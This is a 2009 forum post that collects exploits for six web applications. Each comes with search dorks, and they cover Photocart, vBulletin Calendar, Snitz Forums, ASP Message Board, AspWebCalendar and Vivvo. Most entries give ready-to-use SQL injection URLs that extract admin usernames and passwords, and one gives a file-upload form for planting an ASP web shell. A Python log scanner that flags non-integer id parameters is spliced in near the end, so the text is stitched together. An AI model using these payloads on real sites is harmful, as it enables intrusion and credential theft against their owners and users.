6 site vulnerabilities
14 March 2009, 13:05

Quote
"Photocart" vulnerability (current): a simple method for hacking an image gallery
Search query (google.com): "allinurl: photocart"

Code to append: /photocart/adminprint.php?admin_folder=shell

====================================================================

vBulletin Calendar vulnerability (if HTML is enabled): usable on vB if HTML is on
There is a hole in Calendar; I don't know whether it counts as a vulnerability, but

http://siteady.com/calendar.php?do=add&type=single&c=1

If HTML code is enabled here, you can write whatever you want.

=============================================================


Snitz Forums 2000 v3.1 SR4 (pop_profile.asp) SQL Injection Vulnerability: milw0rm bug


POC: pop_profile.asp?mode=display&id=[SQL-INJ]


Username:
pop_profile.asp?mode=display&id=1

Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS


=======================================================================================

ASP Message Board 2.2.1c Remote SQL Injection Vulnerability: milw0rm bug


* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password :
http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxxor 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))


================================================================================

 


AspWebCalendar 2008 Remote File Upload Vulnerability: milw0rm bug


# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>


===========================================================================

 

Vivvo Article Manager : <= 3.2 (id) Remote SQL Injection Vulnerability


#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2

#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.

#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]

#Admin Panel:http://[target]/[path]/admin

#For google searching:Vivvo Article Manager
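
The three SQL injection entries above (Snitz pop_profile.asp, ASP Message Board printer.asp, Vivvo pdf_version.php) all reach the query through an `id` parameter, so a defender can flag any request to those scripts whose `id` is not a plain integer. The log check below is an added example, not part of the original post; it assumes Combined Log Format and numeric ids, and the function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts from the entries above whose `id` value ends up inside a SQL query.
# Assumption: a legitimate `id` is always a short non-negative integer.
WATCHED = {"pop_profile.asp", "printer.asp", "pdf_version.php"}
INT_RE = re.compile(r"[0-9]{1,10}")
# Request field of a Combined Log Format line; non-greedy so raw spaces survive.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')


def suspicious_id(target):
    """Return the decoded non-integer `id` value, or None if the request is fine."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() not in WATCHED:
        return None
    # parse_qsl URL-decodes values (%20 and '+' both become spaces).
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # ASP treats parameter names case-insensitively, so match ID/Id/id.
        if key.lower() == "id" and not INT_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client, path, decoded id) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        bad = suspicious_id(m.group(1)) if m else None
        if bad is not None:
            hits.append((line.split(" ", 1)[0], urlsplit(m.group(1)).path, bad))
    return hits


# Constructed sample log lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Mar/2009:13:05:01 +0000] "GET /forum/pop_profile.asp?mode=display&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Mar/2009:13:05:09 +0000] "GET /forum/pop_profile.asp?mode=display&id=-1+union+all+select+0,1,2 HTTP/1.1" 200 4890',
    '198.51.100.7 - - [14/Mar/2009:13:06:30 +0000] "GET /boards/printer.asp?forum=AMB_1&ID=7or%201=convert(int,1) HTTP/1.1" 500 310',
    '203.0.113.5 - - [14/Mar/2009:13:07:02 +0000] "GET /news/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 20480',
    '203.0.113.5 - - [14/Mar/2009:13:07:40 +0000] "GET /news/index.php?id=abc HTTP/1.1" 404 512',
]

if __name__ == "__main__":
    for client, path, value in scan(SAMPLE_LOG):
        print(f"{client} {path} id={value!r}")
```

Applying the same integer check inside the application before the query is built, together with parameterized queries, removes the injection point instead of only reporting it.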

Added by: Angel_Boy